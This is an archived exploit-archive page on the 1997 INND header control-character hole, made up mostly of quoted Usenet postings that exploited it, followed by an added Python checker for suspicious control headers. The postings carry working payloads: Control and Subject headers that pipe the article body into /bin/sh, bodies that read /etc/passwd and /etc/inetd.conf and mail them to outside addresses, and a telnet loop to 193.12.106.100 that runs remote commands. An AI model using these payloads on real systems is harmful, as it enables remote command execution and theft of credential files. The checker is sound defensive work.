INND header control characters hole

Summary
Description: This hole allows someone to attack THOUSANDS of news servers at once by inserting special characters into post headers. This has been widely exploited.
Author: Been known for a while
Compromise: You can REMOTELY execute arbitrary commands under the UID of the news server.
Vulnerable Systems: Systems running versions of INND prior to and including 1.5. Some sites with later versions are vulnerable if they forgot to delete some scripts in the new installation.
Date: Was widely exploited in March 1997
Notes: Here are some examples of exploit postings
Details

Exploit:

[This was posted to a newsgroup:  If someone has a copy w/o the dejanews 
crap, please send it to me.  Thanks.]
[. . .]

FWIW I'll include their complete bodies below my .sig.

-Scott
---
Scott Lystig Fritchie, Network Engineer          MRNet Internet Services, Inc.
fritchie@mr.net, PGP key #152B8725               Minnesota Regional Network
v: 612/362.5820, p: 612/637.9547                 2829 University Ave SE
http://www.mr.net/~fritchie/                     Minneapolis, MN  55414

--- snip --- snip --- snip --- snip --- snip --- snip --- snip --- 

Path: news1.mr.net!mr.net!europa.clark.net!cpk-news-hub1.bbnplanet.com!news.bbnplanet.com!rill.news.pipex.net!pipex!strath-cs!nntphost.dur.ac.uk!nntp
From: David Poulet <D.G.Poulet@durham.ac.uk>
Newsgroups: alt.test
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: 17 Mar 1997 09:51:47 GMT
Organization: University of Durham, Durham, UK.
Lines: 4
Message-ID: <5gj47j$95n@mercury.dur.ac.uk>
NNTP-Posting-Host: juno.dur.ac.uk

#+
 (/bin/uname -a; /bin/who;) | /usr/ucb/Mail -s d.g.poulet@durham.ac.uk
#-

Path: news1.mr.net!mr.net!news.maxwell.syr.edu!news.bc.net!rover.ucs.ualberta.ca!van.istar!west.istar!news.trytel.com!new-netra!wojtek
From: Wojciech Tryc <wojtek@tryc.on.ca>
Newsgroups: ott.test
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh`
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh`
Date: Mon, 17 Mar 1997 11:43:24 -0500
Organization: Trytel Internet
Lines: 3
Sender: wojtek@new-netra
Message-ID: <ML-2.2.858617004.6838.wojtek@new-netra>
Reply-To: Wojciech Tryc <wojtek@tryc.on.ca>
NNTP-Posting-Host: firewall.sofpak.com
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd)|/usr/ucb/Mail wojtek@trytel.com
#-

Path: news1.mr.net!mr.net!news.sgi.com!newsfeed.nacamar.de!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg test
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9121@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 6

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bin/mailx root@[193.12.106.1]
#-

~|/bin/sed -n '/^#+/,/^#-/p'|/bin/sh;echo ignore this

Path: news1.mr.net!mr.net!newsfeed.direct.ca!news.maxwell.syr.edu!newsfeed.nacamar.de!jupiter.nic.dtag.de!news.dvz-mv.de!boettch
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: dvz.test
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: 17 Mar 1997 12:23:23 GMT
Organization: DVZ Datenverarbeitungszentrum M-V GmbH
Lines: 4
Sender: boettch@develop01 (Ronald Boettcher)
Approved: newgroups-request@uunet.uu.net
Message-ID: <5gjd3r$eqf@ns.dvz-mv.de>
NNTP-Posting-Host: develop01.dvz-mv.de

#+
 (/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/bin/Mail -s info bin@le.owlnet.rice.edu
#-

Path: news1.mr.net!mr.net!news.sgi.com!news.maxwell.syr.edu!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9221@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bin/mailx root@[193.12.106.1]
#-

Path: news1.mr.net!mr.net!news.sgi.com!news.maxwell.syr.edu!nntp.uio.no!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg test
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9122@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 6

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail root@[193.12.106.1]
#-

~|/bin/sed -n '/^#+/,/^#-/p'|/bin/sh;echo ignore this

Path: news1.mr.net!mr.net!news.sgi.com!newsfeed.nacamar.de!nntp.uio.no!uninett.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9223@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s kalle root@[193.12.106.1]
#-

Path: news1.mr.net!mr.net!data.ramona.vix.com!sonysjc!sonybc!newsjunkie.ans.net!newsfeeds.ans.net!paperboy.amoco.com!tabloid!usenet
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: 17 Mar 1997 21:44:08 GMT
Organization: Amoco
Lines: 3
Approved: newgroups-request@uunet.uu.net
Message-ID: <5gkdv8$5uc@tabloid.amoco.com>

#+
 (/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s info tafeyereisen@amoco.com
#-

Path: news1.mr.net!mr.net!news.radio.cz!newsbastard.radio.cz!news.radio.cz!CESspool!news.maxwell.syr.edu!cpk-news-hub1.bbnplanet.com!news.bbnplanet.com!news.sesqui.net!rice!nntp.xxxxxxxxx.xxx!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: Sat, 15 Mar 1997 15:15:15 GMT
Organization: Rice University, Houston, Texas
Lines: 3
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9224@uunet.uu.net>
NNTP-Posting-Host: long-eared.owlnet.rice.edu

#+
 (/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s info bin@le.owlnet.rice.edu
#-

Path: news1.mr.net!mr.net!news.sgi.com!newsfeed.nacamar.de!nntp.uio.no!Norway.EU.net!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9220@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 4

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bi>#-
 
Path: news1.mr.net!mr.net!news-peer.gsl.net!news.gsl.net!news.maxwell.syr.edu!nntp.uio.no!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg test
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9120@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 6

#+
(/bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /bi>#-
 
~|/bin/sed -n '/^#+/,/^#-/p'|/bin/sh;echo ignore this
 
Path: news1.mr.net!mr.net!news.sgi.com!news.maxwell.syr.edu!EU.net!Norway.EU.net!online.no!news.omgroup.com!online.no!bounce-back
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request@uunet.uu.net
Message-ID: <830201540.9020@uunet.uu.net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 12

#+
while :; do
  IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1`
  if [ X"$IN" != X"$OIN" ]; then
    (/bin/sleep 2; eval "$IN" 2>&1) |
      /bin/telnet 193.12.106.100 23 >/dev/null 2>&1
    OIN=$IN
  fi
  sleep 30
done
#-

Path: news1.mr.net!mr.net!news.maxwell.syr.edu!news.apfel.de!news-fra1.dfn.de!news-ge.switch.ch!news-zh.switch.ch!not-for-mail
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: Sat, 15 Mar 1997 15:15:15 GMT
Organization: Rice University, Houston, Texas
Lines: 3
Approved: newgroups-request@uunet.uu.net
Message-ID: <6830201540.9224@uunet.uu.net>
NNTP-Posting-Host: sunag.switch.ch

#+
 (/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s info sysadmin@switch.ch
#-

Path: news1.mr.net!mr.net!news.maxwell.syr.edu!newsfeed.nacamar.de!jupiter.nic.dtag.de!news.dvz-mv.de!boettch
From: tale@uunet.uu.net (David C Lawrence)
Newsgroups: dvz.test
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: 17 Mar 1997 12:42:44 GMT
Organization: DVZ Datenverarbeitungszentrum M-V GmbH
Lines: 4
Sender: boettch@develop01 (Ronald Boettcher)
Approved: newgroups-request@uunet.uu.net
Message-ID: <5gje84$eqf@ns.dvz-mv.de>
NNTP-Posting-Host: develop01.dvz-mv.de

#+
 (/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/bin/Mail -s info r.boettcher@dvz-mv.de
#-
 
Path: news1.mr.net!mr.net!feeder.chicago.cic.net!news.sprintlink.net!news-peer.sprintlink.net!europa.clark.net!news.clark.net!news.clark.net!not-for-mail
From: news@clark.net
Newsgroups: clarknet.test
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Date: 17 Mar 1997 12:23:23 GMT
Organization: Just an experiment
Lines: 4
Sender: news@clark.net
Approved: news@clark.net
Message-ID: <abcdefg-this-is-a-test@clark.net.123456.4>
NNTP-Posting-Host: clarknet.clark.net
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
 
#+
(/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.co
nf) | /usr/bin/mailx -s experiment news@clark.net
#-
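
A defender-side check for the header pattern in the postings above, added here as an example (it is not INN's code and not part of the original page): it parses an article's Control: and "Subject: cmsg" headers and reports anything outside a conservative allowlist. The allowlist, the function names and the sample articles are assumptions made for this example.

```python
import email
import re

# Assumption: a conservative allowlist chosen for this example, not INN's own rules.
GROUP_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9+_.-]*\Z")
KNOWN_VERBS = {"newgroup", "rmgroup", "checkgroups", "cancel",
               "sendsys", "version", "senduuname", "ihave", "sendme"}
# A bare "$" is not flagged: legitimate Message-IDs (cancel arguments) contain it.
SHELL_META = re.compile(r"[`|;&(){}'\"\\]|\$[{(]")

def control_commands(article):
    """Collect control commands from Control: and 'Subject: cmsg ...' headers."""
    msg = email.message_from_string(article)
    commands = [v.strip() for v in msg.get_all("Control", [])]
    subject = (msg.get("Subject") or "").strip()
    if subject.startswith("cmsg "):
        commands.append(subject[len("cmsg "):].strip())
    return commands

def reasons_to_reject(command):
    """Return why a control command must not reach a shell script ([] if none)."""
    parts = command.split()
    if not parts:
        return ["empty control command"]
    verb, args = parts[0], parts[1:]
    reasons = [] if verb in KNOWN_VERBS else ["unknown control verb"]
    if verb in ("newgroup", "rmgroup"):
        tail_ok = ([], ["moderated"]) if verb == "newgroup" else ([],)
        if not args or not GROUP_NAME.match(args[0]):
            reasons.append("group name outside allowlist")
        if args[1:] not in tail_ok:
            reasons.append("unexpected trailing argument")
    if SHELL_META.search(command):
        reasons.append("shell metacharacter in header")
    return reasons

def scan(article):
    """Map each suspicious control command in the article to its reasons."""
    return {c: r for c in control_commands(article) if (r := reasons_to_reject(c))}

# Constructed sample articles; BAD reuses the header shown in the postings above.
BAD = """Newsgroups: alt.test
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated

(body omitted)
"""
GOOD = "Newsgroups: alt.test\nControl: newgroup alt.test.example moderated\n\nbody\n"
if __name__ == "__main__": print(scan(BAD), scan(GOOD))
```

A check like this is a filter in front of the control-message scripts; the underlying fix is that header text is never expanded by a shell in the first place.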


This page is part of Fyodor's exploit world.